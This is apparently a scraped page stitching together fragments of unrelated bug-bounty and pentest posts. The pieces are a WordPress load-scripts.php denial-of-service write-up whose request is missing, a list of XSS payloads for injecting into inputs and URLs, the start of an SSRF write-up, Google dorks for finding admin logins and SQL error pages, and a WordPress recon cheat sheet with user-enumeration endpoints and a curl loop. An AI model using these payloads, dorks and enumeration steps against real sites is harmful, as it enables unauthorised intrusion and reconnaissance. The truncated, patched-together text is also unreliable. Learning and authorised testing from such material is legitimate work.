Denial of Service vulnerability in script-loader.php (CVE-2018-6389)

The load-scripts.php file receives a parameter called load[], the parameter value is ‘jquery-ui-core’. In the response, I received the JS module ‘jQuery UI Core’ that was requested

  What can be concluded from this URL, is that it is probably meant to supply users with some JS modules. In addition, the load[] parameter is an array, which means that it is possible to provide multiple values and be able to get multiple JS modules within the response.

   I wondered what would happen if I sent the server a request to supply me every JS module that it stored? A single request would cause the server to perform 181 I/O actions and provide the file contents in the response.

So I tried it, I sent the request to the server:

The server responded after 2.2 seconds, with almost 4MB of data, which made the server work really hard to process such a request.

Best XSS Vectors

Here’s a small #XSS list for manual testing (main cases, high success rate).

 "><img src onerror=alert(1)> 
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)

Try it on: – URL query, fragment & path; – all input fields.

From BruteLogic Twitter account : https://twitter.com/brutelogic

SSRF | Reading Local Files from DownNotifier server

Hello guys, this is my first write-up and I would like to share it with the bug bounty community, it’s a SSRF I found some months ago.

DownNotifier is an online tool to monitor a website
downtime. This tool sends an alert to registered email and sms when the website
is down.

DownNotifier has a BBP on Openbugbounty, so I decided to take a look on https://www.downnotifier.com. When I browsed to the website, I noticed a text field for URL and SSRF vulnerability quickly came to mind.

Collection of information | Google Hacking and Dorks basic

Find the login panel
site: objective.com inurl: admin | administrator | adm | login | l0gin | wp-login

SQL INJECTION
site: target.com intext: “sql syntax near” or “syntax error has occurred” or “incorrect syntax near” or “unexpected end of SQL command” or “Warning: mysql_connect ()” or “Warning: mysql_query ()” or “Warning: pg_connect ()” or “Warning: mysql_fetch_array ()”

site: target.com intext: “sql syntax near” or
“syntax error has occurred”
“incorrect syntax near”
“unexpected end of SQL command”
“Warning: mysql_connect ()”
“Warning: mysql_query ()”
“Warning: pg_connect ()”
“Warning: mysql_fetch_array ()”
“MySQL Query Failed”

WordPress basic auditing

Wordpress Read me
target/readme.html

Wordpress License with wordpress version
target/license.txt

Wordpress sample config:
target/wp-config-sample.php

Wordpress installation:
target/wp-admin/install.php

Wordpress upgrade file:
target/wp-admin/upgrade.php

Wordpress setup config:
target/wp-admin/setup-config.php

Wordpress Api usefull paths:
target/wp-json/wp/v2/users – enumerate users
target/wp-json/wp/v2/posts – enumerate posts
target/wp-json – wordpress api

Script to enumerate users thought authors of blog:
for i in {1..30}; do curl -s -L -i target | grep -E -o “\” title=\”View all posts by [a-z0-9A-Z-.]|Location:.” | sed ‘s/\// /g’ | cut -f 6 -d ‘ ‘ | grep -v “^$”; done

Wordpress Plugins readme or license:
target/wp-content/plugins/plugin name/readme.txt or /license.txt

Wordpress Theme readme or license:
target/wp-content/theme/nome-do-theme/readme.txt, /changeglog.txt or /license.txt